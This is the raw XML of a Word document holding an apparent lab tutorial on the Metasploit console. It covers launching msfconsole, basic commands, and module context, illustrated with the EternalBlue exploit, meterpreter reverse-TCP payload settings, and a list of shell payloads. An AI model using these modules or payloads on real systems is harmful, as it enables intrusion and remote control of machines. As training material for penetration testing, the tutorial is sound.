          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Correct Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567AD8CB" w14:textId="77777777" w:rsidR="00146E29" w:rsidRPr="00146E29" w:rsidRDefault="00146E29" w:rsidP="00146E29">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146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBCA9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Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>As previously mentioned, the console will be your main interface to the Metasploit Framework. You can launch it using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command on your AttackBox terminal or any system the Metasploit Framework is installed on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F91EA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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A1EA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root@ip-10-10-220-191</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msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5415A2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D13D25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7A1A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_---------.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B06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708090"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>######   ;."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F8D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w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="EE9900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>`</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999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DC0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            @@@@@',.'@@@@ "</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A51F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 @</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AFEE6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4C5AC1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        @ ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'-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50B3FB6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 @       @ `.  ;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF97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r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="9A6E3A"/>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     @    </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DD4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081A32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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD8D0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1853F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_____________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595AA9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3 C    )     /|___ / Metasploit! \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627CA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__*__,."    \|--- \_____________/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DA0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187AAD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B19A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485BF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metasploit v6.0                         ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1131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--=[ 2048 exploits - 1105 auxiliary - 344 post       ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A5C43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--=[ 562 payloads - 45 encoders - 10 nops            ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32651F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--=[ 7 evasion                                       ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C88F49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1D24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Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216801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43C8C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51DE7A2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F00F57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Once launched, you will see the command line changes to msf6 (or msf5 depending on the installed version of Metasploit). The Metasploit console (msfconsole) can be used just like a regular command-line shell, as you can see below. The first command </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>is </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> which lists the contents of the folder from which Metasploit was launched using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5EB7D"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is followed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> sent to Google's DNS IP address (8.8.8.8). As we operate from the AttackBox, which is Linux we had to add the </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-c 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> option, so only a single ping was sent. Otherwise, the ping process would continue until it is stopped using </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CTRL+C</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7EDA8"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in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622518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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44222C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6E1B6F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7E6E7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burpsuite_community_linux_v2021_8_1.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t>Instructions  Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666114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Pictures      thinclient_drives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355EB4C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0D49EF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ping -c 1 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EB2A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ping -c 1 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9257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4AEE37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PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458AC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64 bytes from 8.8.8.8: icmp_seq=1 ttl=109 time=1.33 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F123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5E04BB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--- 8.8.8.8 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4C2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1 packets transmitted, 1 received, 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packet loss, </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFAF00"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E1D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rtt min/avg/max/mdev = 1.335/1.335/1.335/0.000 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F12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63D3666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400C472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will support most Linux commands, including </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>clear</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> (to clear the terminal screen), but will not allow you to use some features of a regular command line (e.g. does not support output redirection), as seen below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32124C7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Failed Output Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BDB3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help &gt; help.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E5244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such command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE39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7BD71B4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3F24A7"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While on the subject, the help command can be used on its own or for a specific command. Below is the help menu for the set command we will cover soon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DDFD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Help feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753094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help set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C157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Usage: set [option] [value]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B381A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3E8D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Set the given option to value.  If value is omitted, print the current value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681911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both are omitted, print options that are currently set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0AE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23D9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run from a module context, this will set the value in the module's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62352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datastore.  Use -g to operate on the global datastore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F318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3BDF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setting a PAYLOAD, this command can take an index from `show payloads'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF30A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A589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525CEEF"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80692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use the history command to see commands you have typed earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E340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History command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F32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history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B82F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1  use exploit/multi/http/nostromo_code_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF995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2  set lhost 10.10.16.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDD9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3  set rport 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC808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4  options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5178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5  set rhosts 10.10.29.187</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609342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6  run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C774A6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7  exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576E42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8  exit -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF2C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9  version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47534B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10  use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187632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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F3A8B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An important feature of msfconsole is the support of tab completion. This will come in handy later when using Metasploit commands or dealing with modules. For example, if you start typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> and press the tab key, you will see it auto-completes to </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C03EB"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Msfconsole is managed by context; this means that unless set as a global variable, all parameter settings will be lost if you change the module you have decided to use. In the example below, we have used the ms17_010_eternalblue exploit, and we have set parameters such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RHOSTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. If we were to switch to another module (e.g. a port scanner), we would need to set the RHOSTS value again as all changes we have made remained in the context of the ms17_010_eternalblue exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F11E2"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Let us look at the example below to have a better understanding of this feature. We will use the MS17-010 “Eternalblue” exploit for illustration purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336DD7D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Once you type the </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command, you will see the command line prompt change from msf6 to “msf6 exploit(windows/smb/ms17_010_eternalblue)”. The "EternalBlue" is an exploit allegedly developed by the U.S. National Security Agency (N.S.A.) for a vulnerability affecting the SMBv1 server on numerous Windows systems. The SMB (Server Message Block) is widely used in Windows networks for file sharing and even for sending files to printers. EternalBlue was leaked by the cybercriminal group "Shadow Brokers" in April 2017. In May 2017, this vulnerability was exploited worldwide in the WannaCry ransomware attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDB9D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Using an exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFD8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use exploit/windows/smb/ms17_010_eternalblue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA728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payload configured, defaulting to windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD5F4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7D23076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module to be used can also be selected with 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command followed by the number at the beginning of the search result line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1229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While the prompt has changed, you will notice we can still run the commands previously mentioned. This means we did not "enter" a folder as you would typically expect in an operating system command line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF8B8AC"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within a context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D172B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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A43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7C6D473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52EE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burpsuite_community_linux_v2021_8_1.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t>Instructions  Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387969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Pictures      thinclient_drives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A967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24F4F7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64B6FEE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B5E82F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prompt tells us we now have a context set in which we will work. You can see this by typing the show options command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D338C3"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Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6935746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42C0161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E1B8B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61BAFB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49C6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725979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6DA767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4A336FC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yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32533D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3E6BD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4AC523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07E03B5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05065F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6764C9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089037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5627E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options (windows/x64/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4563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FFC2B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829CD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56CD4D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EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20D42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LHOST     10.10.220.191    yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7879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LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB0A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2F396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5E29BD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Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182AA4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CA5D5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Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C02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p>
    <w:p w14:paraId="7C98EF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21FE56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B0C1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3FF8C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0DBF0CC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5592FA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This will print options related to the exploit we have chosen earlier. The show options command will have different outputs depending on the context it is used in. The example above shows that this exploit will require we set variables like RHOSTS and RPORT. On the other hand, a post-exploitation module may only need us to set a SESSION ID (see the screenshot below). A session is an existing connection to the target system that the post-exploitation module will use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798667A5"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Options for a post-exploitation module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34430B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post(windows/gather/enum_domain_users) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1DBA6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85713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(post/windows/gather/enum_domain_users):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305421D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A41C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00F5F9A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777646F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HOST                      no        Target a specific host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C60E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SESSION                   yes       The session to run this module on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E12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USER                      no        Target User for NetSessionEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C3B6E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34CA7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msf6 post(windows/gather/enum_domain_users) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC066B3"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630DA4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command can be used in any context followed by a module type (auxiliary, payload, exploit, etc.) to list available modules. The example below lists payloads that can be used with the ms17-010 Eternalblue exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B321249"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show payloads command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF43B1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show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C6A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54F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Compatible Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F392D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0F82AE8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E6A9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5DFB7B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13AD2A1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generic/custom                                               manual  No     Custom Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533C7C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generic/shell_bind_tcp                                       manual  No     Generic Command Shell, Bind TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E843C4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generic/shell_reverse_tcp                                    manual  No     Generic Command Shell, Reverse TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209CD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windows/x64/exec                                             manual  No     Windows x64 Execute Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29396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windows/x64/loadlibrary                                      manual  No     Windows x64 LoadLibrary Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B9E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windows/x64/messagebox                                       manual  No     Windows MessageBox x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440E1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windows/x64/meterpreter/bind_ipv6_tcp                        manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager</w:t>
      </w:r>
    </w:p>
